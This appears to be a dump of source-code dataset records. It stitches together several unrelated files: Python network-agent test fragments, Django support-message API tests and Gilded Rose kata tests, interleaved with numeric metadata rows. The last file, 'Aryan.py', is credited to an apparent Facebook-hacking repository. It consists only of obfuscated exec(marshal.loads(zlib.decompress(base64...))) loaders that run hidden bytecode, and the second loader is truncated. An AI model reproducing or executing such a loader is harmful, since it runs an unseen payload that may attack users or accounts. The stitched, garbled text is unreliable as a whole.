# Detach remaining port from each network
self.agent.bagpipe_port_detach(None, dummy_detach11)
self.agent.bagpipe_port_detach(None, dummy_detach21)
# Check if calls on BaGPipe BGP API are as expected
send_detach_fn.assert_has_calls(expected_calls)
# Verify attachments list consistency
for network_id in [base.NETWORK1['id'], base.NETWORK2['id']]:
self._check_network_info(network_id, 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
class TestServiceBaGPipeL2LinuxBridge(
        base.BaseTestBaGPipeBGPAgentLinuxBridge, TestServiceBaGPipeL2Mixin):
    """Run the BaGPipe L2 mixin tests against the Linux bridge agent base."""
    pass
| 45.719844
| 78
| 0.523489
| 1,165
| 11,750
| 4.930472
| 0.127039
| 0.048572
| 0.043001
| 0.066156
| 0.846971
| 0.827124
| 0.814067
| 0.782208
| 0.75
| 0.75
| 0
| 0.039286
| 0.408596
| 11,750
| 256
| 79
| 45.898438
| 0.787308
| 0.090468
| 0
| 0.816667
| 0
| 0
| 0.030303
| 0.012947
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.033333
| false
| 0.005556
| 0.016667
| 0
| 0.061111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6239a44b0aa5471a408d31ec09e5b677d54a8dc4
| 122
|
py
|
Python
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 55
|
2021-05-11T16:01:59.000Z
|
2022-03-30T14:30:33.000Z
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 943
|
2021-05-10T14:00:02.000Z
|
2022-03-31T21:28:15.000Z
|
py/jpy-integration/src/javaToPython/python/io/deephaven/jpy/integration/my_class.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 29
|
2021-05-10T11:33:16.000Z
|
2022-03-30T21:01:54.000Z
|
class MyClass:
    """Stateless fixture class exposing a couple of trivial methods."""

    def __init__(self):
        """Nothing to initialize; the class carries no state."""
        pass

    def plus43(self, x):
        """Return *x* increased by the constant 43."""
        return x + 43

    def echo(self, x):
        """Return *x* unchanged."""
        return x
| 13.555556
| 22
| 0.598361
| 19
| 122
| 3.631579
| 0.578947
| 0.144928
| 0.318841
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046512
| 0.295082
| 122
| 9
| 23
| 13.555556
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.142857
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
624301f30125d2ec95565452ea4af9cac27ed204
| 5,374
|
py
|
Python
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 1
|
2018-03-18T21:06:00.000Z
|
2018-03-18T21:06:00.000Z
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 42
|
2018-04-03T17:30:52.000Z
|
2021-06-10T19:44:04.000Z
|
api/tests/support_viewset_test.py
|
UnbFeelings/UnbFeelings_api
|
73c725113bc89ae4754a68f958eeaae6da85876e
|
[
"MIT"
] | 2
|
2018-04-08T00:57:50.000Z
|
2018-08-01T19:48:58.000Z
|
# -*- coding: utf-8 -*-
from rest_framework.test import APITestCase, APIClient
from django.contrib.auth import get_user_model
from api.models import Campus, Course, Subject, Support
from api.tests.helpers import create_test_user, TestCheckMixin
UserModel = get_user_model()
class SupportTestCase(APITestCase, TestCheckMixin):
    """Tests for the support-message API under ``/api/support/``.

    Covers creating support messages between two users, listing the
    messages a user sent / received, the empty-list cases, and the
    unauthenticated (401) cases.
    """

    @create_test_user(email="test@user.com", password="testuser")
    @create_test_user(email="test2@user.com", password="testuser2")
    def setUp(self):
        # Two users: one sends support messages, the other receives them.
        self.user_sender = UserModel.objects.get(email="test@user.com")
        self.user_receiver = UserModel.objects.get(email="test2@user.com")

    def _authed_client(self, email, password):
        """Return an APIClient logged in and JWT-authenticated as *email*.

        Extracted because every authenticated test repeated the same
        login / token / credentials boilerplate.
        """
        client = APIClient()
        client.login(username=email, password=password)
        token = self._get_user_token(email, password)
        client.credentials(HTTP_AUTHORIZATION='JWT {}'.format(token))
        return client

    def test_user_create_posts(self):
        client = self._authed_client("test@user.com", "testuser")
        data = {"message": "#VoltaRonyCoins"}
        response = client.post(
            '/api/support/' + str(self.user_receiver.id) + '/', data)
        self.assertEqual(201, response.status_code)
        self.assertEqual(data["message"], response.data['message'])
        self.assertEqual(self.user_sender.id, response.data['student_from'])
        self.assertEqual(self.user_receiver.id, response.data['student_to'])

    def test_get_supports_made_by_user(self):
        client = self._authed_client("test@user.com", "testuser")
        data = {"message": "#VoltaRonyCoins"}
        client.post('/api/support/' + str(self.user_receiver.id) + '/', data)
        response = client.get('/api/support/from_student/', data)
        self.assertEqual(200, response.status_code)
        result = response.data['results'][0]
        self.assertEqual(data["message"], result['message'])
        self.assertEqual(self.user_sender.id, result['student_from'])
        self.assertEqual(self.user_receiver.id, result['student_to'])

    def test__get_supports_made_to_user(self):
        sender = self._authed_client("test@user.com", "testuser")
        data = {"message": "#VoltaRonyCoins"}
        sender.post('/api/support/' + str(self.user_receiver.id) + '/', data)
        sender.logout()
        # Read back the message as the receiving user.
        receiver = self._authed_client("test2@user.com", "testuser2")
        response = receiver.get('/api/support/to_student/', data)
        self.assertEqual(200, response.status_code)
        result = response.data['results'][0]
        self.assertEqual(data["message"], result['message'])
        self.assertEqual(self.user_sender.id, result['student_from'])
        self.assertEqual(self.user_receiver.id, result['student_to'])

    def test_get_none_supports_made_by_user(self):
        client = self._authed_client("test@user.com", "testuser")
        response = client.get('/api/support/from_student/', {})
        self.assertEqual(200, response.status_code)
        self.assertEqual(0, response.data['count'])

    def test_get_none_supports_made_to_user(self):
        client = self._authed_client("test@user.com", "testuser")
        response = client.get('/api/support/to_student/', {})
        self.assertEqual(200, response.status_code)
        self.assertEqual(0, response.data['count'])

    def test_post_support_denied_permission(self):
        # No login and no token: the API must reject the request.
        client = APIClient()
        response = client.post(
            '/api/support/' + str(self.user_receiver.id) + '/', {})
        self.assertEqual(401, response.status_code)

    def test_get_support_to_student_denied_permission(self):
        response = APIClient().get('/api/support/to_student/', {})
        self.assertEqual(401, response.status_code)

    def test_get_support_from_student_denied_permission(self):
        response = APIClient().get('/api/support/from_student/', {})
        self.assertEqual(401, response.status_code)
| 32.569697
| 87
| 0.660216
| 631
| 5,374
| 5.391442
| 0.120444
| 0.092593
| 0.065844
| 0.042328
| 0.855085
| 0.803645
| 0.803645
| 0.79806
| 0.767784
| 0.736038
| 0
| 0.00977
| 0.200037
| 5,374
| 165
| 88
| 32.569697
| 0.781577
| 0.032936
| 0
| 0.701031
| 0
| 0
| 0.153061
| 0.028879
| 0
| 0
| 0
| 0
| 0.195876
| 1
| 0.092784
| false
| 0.082474
| 0.041237
| 0
| 0.14433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
65af156d49c5aab0fb0bad3d260136faea3f555b
| 3,402
|
py
|
Python
|
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
python/test_gilded_rose.py
|
ChristelleJolly/kata-clean-code-gilded-rose
|
b0518612893c1c06d2f6f375771d9ac2f1d6efa2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from gilded_rose import Item, GildedRose
class GildedRoseTest(unittest.TestCase):
    """Characterization tests for ``GildedRose.update_quality()``."""

    @staticmethod
    def _updated(item, times=1):
        """Apply *times* quality updates to a single *item*, return it."""
        shop = GildedRose([item])
        for _ in range(times):
            shop.update_quality()
        return item

    def test_item_name_doesnt_change(self):
        item = self._updated(Item("foo", 0, 0))
        self.assertEqual("foo", item.name)

    def test_sell_in_lowers_by_1_for_standard_item(self):
        item = self._updated(Item("foo", 15, 0))
        self.assertEqual(14, item.sell_in)

    def test_quality_lowers_by_1_for_standard_item(self):
        item = self._updated(Item("foo", 15, 10))
        self.assertEqual(9, item.quality)

    def test_quality_lowers_by_2_when_date_passed_for_standard_item(self):
        item = self._updated(Item("foo", 0, 10))
        self.assertEqual(8, item.quality)

    def test_quality_is_never_negative(self):
        item = self._updated(Item("foo", 0, 0))
        self.assertGreaterEqual(item.quality, 0)

    def test_aged_brie_quality_increases_by_1(self):
        item = self._updated(Item("Aged Brie", 15, 10))
        self.assertEqual(11, item.quality)

    def test_quality_is_never_more_than_fifty(self):
        item = self._updated(Item("Aged Brie", 15, 50))
        self.assertLessEqual(item.quality, 50)

    def test_sulfuras_sell_in_never_change(self):
        item = self._updated(Item("Sulfuras, Hand of Ragnaros", 15, 80))
        self.assertEqual(15, item.sell_in)

    def test_sulfuras_quality_never_change(self):
        item = self._updated(Item("Sulfuras, Hand of Ragnaros", 15, 80))
        self.assertEqual(80, item.quality)

    def test_backstage_passes_quality_increase_by_1_when_more_than_10_days_left(self):
        item = self._updated(
            Item("Backstage passes to a TAFKAL80ETC concert", 15, 10))
        self.assertEqual(11, item.quality)

    def test_backstage_passes_quality_increase_by_2_when_10_to_6_days_left(self):
        item = self._updated(
            Item("Backstage passes to a TAFKAL80ETC concert", 10, 10),
            times=2)
        self.assertEqual(14, item.quality)

    def test_backstage_passes_quality_increase_by_3_when_less_than_6_days_left(self):
        item = self._updated(
            Item("Backstage passes to a TAFKAL80ETC concert", 5, 10),
            times=2)
        self.assertEqual(16, item.quality)

    def test_backstage_passes_quality_drops_to_0_when_date_passed(self):
        item = self._updated(
            Item("Backstage passes to a TAFKAL80ETC concert", 0, 10))
        self.assertEqual(0, item.quality)
if __name__ == "__main__":
    # Allow running this test module directly as a script.
    unittest.main()
| 36.978261
| 86
| 0.679894
| 443
| 3,402
| 4.875847
| 0.167043
| 0.134259
| 0.111111
| 0.159722
| 0.829167
| 0.812963
| 0.765278
| 0.750926
| 0.709259
| 0.681944
| 0
| 0.037453
| 0.215168
| 3,402
| 91
| 87
| 37.384615
| 0.771536
| 0.006173
| 0
| 0.472222
| 0
| 0
| 0.076946
| 0
| 0
| 0
| 0
| 0
| 0.180556
| 1
| 0.180556
| false
| 0.125
| 0.027778
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
65dcca96f24b6939a6fbd8cdf771bbd3f8aa9814
| 11,887
|
py
|
Python
|
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
Aryan.py
|
Aryanjan002/Aryan_fbhack1
|
0223a85bfca11bee0dca681f873d9bcd23eec074
|
[
"Apache-2.0"
] | null | null | null |
# Compile By Aryan_Hacker
# YouTube ARYAN_HACK
# https://github.com/Aryanjan002/Aryan_fchack1
# telegram t.me/Aryan jan
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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"))))
exec(marshal.loads(zlib.decompress(base64.b64decode("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